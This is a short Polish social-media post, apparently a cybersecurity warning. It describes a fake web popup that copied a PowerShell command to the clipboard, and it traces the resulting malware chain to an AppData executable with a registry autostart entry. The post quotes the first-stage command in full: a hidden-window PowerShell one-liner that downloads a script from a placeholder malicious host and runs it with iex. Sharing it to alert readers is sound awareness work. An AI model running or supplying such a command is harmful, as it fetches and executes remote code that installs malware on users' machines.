Takie coś mi wyskoczyło na jednej stronie, przy wyłączonym adblocku. W schowku była komenda do wykonania w powershellu. To był jakiś prosty skrypt, który ściągał plik tekstowy i uruchamiał go jako kolejny skrypt. Drugi skrypt z pliku tekstowego ściągał plik zip, rozpakowywał, uruchamiał exe z katalogu. Exe rozgaszczał się jak sądzę w AppData a do rejestru dodawany był wpis potrzebny do autostartu.
W schowku była komenda do wykonania w powershellu. To był jakiś prosty skrypt, który ściągał plik tekstowy i uruchamiał go jako kolejny skrypt. Drugi skrypt z pliku tekstowego ściągał plik zip, rozpakowywał, uruchamiał exe z katalogu. Exe rozgaszczał się jak sądzę w AppData a do rejestru dodawany był wpis potrzebny do autostartu.
Pierwszy skrypt
powershell.exe -W Hidden -command $url = 'adreszlosliwejstronyinternetowej.com/n2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
#cyberbezpieczenstwo #cybersecurity
Tu podobna historia: https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/